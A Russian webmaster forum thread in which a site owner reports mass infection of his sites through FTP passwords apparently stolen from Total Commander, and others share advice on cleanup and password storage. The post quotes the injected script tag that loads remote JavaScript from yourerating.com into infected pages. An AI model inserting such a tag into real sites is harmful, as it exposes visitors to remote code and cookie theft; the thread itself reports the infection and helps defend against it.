- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Обнаружил сегодня заражение своих сайтов. По возможности везде прописывалась строка:
<script src="http://yourerating.com/cookiesave.js"></script>
Начал срочно менять пароли на FTP (а это не просто) и убирать последствия. Полез в сеть по поводу этого явления и ничего не нашёл. Пусто. Собственно на акаунте робот пробегается по всем файлам и заражает в основном index.php (htm) файлы, а также config.php, header.php, footer.php, auth.php и т.д. также возможно index.htm, main.htm и похожее
Если на сайте стоит какой-то популярный движок ( Joomla, WordPress, phpBB и т.д. ) то тут заражение идёт полным ходом, причём согласно архитектуре самого движка.
Интегрирует код очень аккуратно, работоспособность сайтов не теряется. Благо у меня все сайты самописные, поэтому аккуратно влезть не получилось.
Срочно начал устранять последствия. В некоторых случаях откат на 7 августа, в некоторых пришлось руками. Пока делал лазал по сети искал информацию. И только час назад начала появляться инфа, что заражаются сайты.
Теперь любопытное. Затронуты были аккаунты которым более 2-3 месяц. Те аккаунты, которые я добавлял в Total Commander ( а на свою безбожную глупость сохранял пароли от ftp именно в нём) месяц 1 - 1,5 назад затронуты не были. Сайты были чисты и невинны.
Предположу, что с месяца 2 назад был сбор ftp аккаунтов троянами (одним или нескольким). Как раз в тот период я только у себя ловил по трояну через каждые 3 дня, которые ни один антивирь не ощущал. Только после отправки в лаборатории со следующим обновлением антивирусы видели эту заразу.
Затем похоже был период подготовки. И сейчас началась активная проработка собранной базы. По датам файлы изменялись 8-го августа и 9-го (т.е. буквально сегодня).
Ну и надо отдать должное создателям этой заразы, что проработали они всё на славу. Внедрённый код не мешает работоспособности большинству сайтов. Я и по своим-то узнал случайно, когда сайты с GZIP архивацией стали выдавать ошибки. Грешил на хостинг, но когда полез узнавать волосы даже подмышками зашевелились.
Будем наблюдать за ситуацией, но судя по тому, что местами стали появляться люди с это проблемой возможно это только начало.
Предполагаемая причина, как всегда, сбор паролей из тотал коммандера, как я понимаю?
Предполагаемая причина, как всегда, сбор паролей из тотал коммандера, как я понимаю?
Совершенно верно. И самое любопытное, что я уже на подобной хне обжигался, правда в прошлый раз это было не так больно, и долгое время пароли не хранил, а тут самонадеянность и пр. пр. пр.
mymind, Чем опасен такой зверь? И как защитить тотал от такого вот воровства?
greenlen, без понятия. Самый лучший способ обезопаситься не хранит пароли в Total коммандере. Других вариантов походу нет.
В filezilla пароли хранить тоже не стоит, или только тотал под прицелом?
Dmytro, наверняка знать не могу. Будет информация появляться, будет ясно. Еще скажу вот что. Аккаунты, где FTP-ник был доступен только с определённого IP также не пострадали.
В общем совет всем. Не хранить пароли в Total, а если храните то доступ к FTP делайте обязательным только с определённого IP. ну или подсети, если нет постоянки.
В filezilla пароли хранить тоже не стоит, или только тотал под прицелом?
У меня вообще 11 паролей, в голове все не удержишь, приходится где то хранить. Тем более некоторые, это просто рендомный набор букв и цифр. Куда сливать, что бы не достали, без понятия.
Могу подтвердить - как раз сегодня клиенту бекап восстановливали. Но, у него заражение случилось 7 августа так что вероятно это разница просто из за количество украденных фтп паролей. Логинились сразу, подбора паролей не было. Ай-пи адрес откуда логинились отправили в абуз отдел соответствующего ДЦ.
Сайты это конечно важно но, не забудьте что у вас на компьютере сидит троян/вирус и необходимо его почистить. Пометять пароли стоит не только от фтп но и от всего что у вас используется на компьютере. Взлом почтовых ящиков к примеру никто не отменял.
Неплохо также обратиться к хостеру чтобы он проверил откуда закачивали файлы. Это поможет и хостеру и его другим клиентам да и вам в конечном счете.
Если у вас Windows то есть неплохая программа Roboform. Можно также использовать Lastpass.com Если же у вас линукс то там полно криптовщиков текстовых файлов. Может и не так удобно зато не смогут ничего украсть даже если подцепите трояна. А вообще для виндоуз кардинальный способ избавиться от такого рода проблем - поставить на комп. впс софт типа VirtualBox, воткнуть туда винхп или другую винду и ходить по сайтам только из впски. Ну и не ничего серьезного и нужного в впске не хранить. Переставить ее будет не проблемой в случае чего да и красть там нечего будет :)
Сохранять пароли в тотале ни в коем случае нельзя. Многие так именно и делают. А вообще создал документ, записал пароль и убрал его далеко от винды будь то сьёмный диск или самый лучший способ рукопись, до неё уж точно троян не доберётся.
В filezilla пароли хранить тоже не стоит, или только тотал под прицелом?
Всю сохраненную информацию - хосты, логины, пароли, порты Filezilla хранит в нешифрованном виде (как есть) в файле sitemanager.xml, расположенном в папке
Так что даже если в FZ пока никто не целился, не надо хранить в ней пароли.